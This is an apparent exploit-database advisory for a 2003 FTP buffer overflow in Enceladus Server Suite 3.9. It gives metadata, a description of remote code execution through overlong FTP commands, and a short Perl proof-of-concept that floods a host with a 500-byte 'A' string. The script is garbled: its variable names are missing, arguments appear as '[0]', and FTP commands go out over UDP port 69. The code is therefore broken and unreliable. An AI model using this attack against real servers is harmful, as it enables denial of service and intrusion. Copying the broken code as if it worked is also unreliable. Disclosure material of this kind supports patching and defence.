Enceladus Server Suite Buffer Overflow Vulnerability

vendor:

Enceladus Server Suite

by:

Sapient2003

7.5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Enceladus Server Suite

Affected Version From: 3.9

Affected Version To: 3.9

Patch Exists: Yes

Related CWE: N/A

CPE: a:mollensoft_software:enceladus_server_suite

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2003

Enceladus Server Suite Buffer Overflow Vulnerability

Enceladus Server Suite is prone to a remotely exploitable buffer overflow vulnerability. It is possible to trigger this condition by supplying an overly long value for several FTP commands. To exploit this issue, the attacker must be able to authenticate to the FTP server included in Enceladus and issue a maliciously crafted command. Successful exploitation will enable a remote attacker to execute arbitrary code with the privileges of the Enceladus Server Suite software, which will most likely run with SYSTEM (or equivalent) privileges. This vulnerability may also be used to cause a denial of service.

Mitigation:

Ensure that the Enceladus Server Suite is up to date with the latest security patches and updates.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6345/info

Enceladus Server Suite is prone to a remotely exploitable buffer overflow vulnerability. It is possible to trigger this condition by supplying an overly long value for several FTP commands. To exploit this issue, the attacker must be able to authenticate to the FTP server included in Enceladus and issue a maliciously crafted command.

Successful exploitation will enable a remote attacker to execute arbitrary code with the privileges of the Enceladus Server Suite software, which will most likely run with SYSTEM (or equivalent) privileges. This vulnerability may also be used to cause a denial of service.

This issue has been reported for Enceladus Server Suite 3.9. Other versions may also be affected.


#!/usr/bin/perl -w



use IO::Socket;



 = "Mollensoft Software Enceladus Server Suite 3.9";



unless (@ARGV == 3) {

 print "\n By Sapient2003\n";

 die "usage: -bash <host to exploit> <user> <password>\n";

}

print "\n By Sapient2003\n";



 = "A" x 500;

 = "USER [1]\nPASS [2]\nCWD ";



 = IO::Socket::INET->new(

        PeerAddr => [0],

        PeerPort => 69,

        Proto    => "udp",

) or die "Can't find host [0]\n";

print  ;

print "Attempted to exploit [0]\n";

close();